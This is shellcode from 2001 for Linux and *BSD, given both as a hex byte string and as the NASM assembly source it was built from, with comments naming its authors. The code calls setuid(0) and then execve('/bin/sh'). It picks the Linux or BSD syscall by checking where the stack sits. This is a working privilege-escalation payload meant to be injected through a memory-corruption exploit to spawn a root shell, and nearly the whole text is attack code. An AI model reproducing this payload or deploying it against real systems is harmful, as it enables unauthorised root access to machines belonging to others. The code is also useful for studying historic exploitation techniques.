"\x31\xdb\xf7\xe3\xb0\x17\x50\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\xbe\xef\xbe\xff\xbf\x39\xf4\x7f\x07"
"\x52\x53\xb0\x3b\x50\xcd\x80\x53\x89\xe1\xb0\x0b\xcd\x80";

#Program: setuid, execve /bin/sh shellcode for Linux and *BSD
#Program by: lockdown	(www.lockeddown.net)
#date: July 27, 2001
#last updated: Nov 28, 2001
#canis (www.0xfee1dead.net) cleaned up and optimised this code greatly.
#The following code was used to make the above shellcode.
segment .text
	global main
main:   
        xor  ebx, ebx
        mul  ebx		#eax, ebx, and edx are all
	
	mov  al, 23		#23 syscall setuid
	push eax
	int  0x80

	push edx
        push dword '//sh'
        push dword '/bin'
        mov  ebx, esp
        push edx

        mov  esi, dword 0xbfffbeef
        cmp  esp, esi
        jg  short linux

        push edx
        push ebx

        mov al, 59		#59 syscall execve BSD
        push eax
        int  0x80

linux:
        push ebx
        mov  ecx, esp
	mov  al, 11		#11 syscall execve linux
	int  0x80